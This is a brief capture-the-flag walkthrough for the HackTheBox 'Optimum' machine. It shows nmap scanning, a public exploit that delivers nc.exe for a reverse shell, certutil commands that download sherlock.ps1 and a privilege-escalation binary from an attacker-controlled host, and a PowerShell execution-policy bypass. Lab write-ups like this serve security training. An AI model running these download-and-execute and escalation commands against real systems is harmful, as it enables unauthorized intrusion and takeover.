Optimum HTB
Enumeration
We use
nmap -p- -A -Pn 10.10.10.8
to enumerate:We found a website:
Exploitation
We used the exploit https://www.exploit-db.com/exploits/39161 we need nc.exe
we can find it in /usr/share/windows-resources/binaries/nc.exe and paste it into our Downloads/optimum folder
We modify the ip in the exploit file
python3 -m http.server 80
and host our current directory for the nc.exe fileWe keep running the exploit with
python 39161.py 10.10.10.8 80
to get the shell:Then we upload sherlock(https://github.com/rasta-mouse/Sherlock) using
certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1
Then use it to look for vulnerabilites using:
powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}"
:We can also use wesng(https://github.com/bitsadmin/wesng)
We use https://github.com/sensepost/ms16-098/blob/master/bfill.exe to get privilege escalation by uploading the file first
certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exe
and then executing itbfill.exe
:We get a root shell.
Last updated
Was this helpful?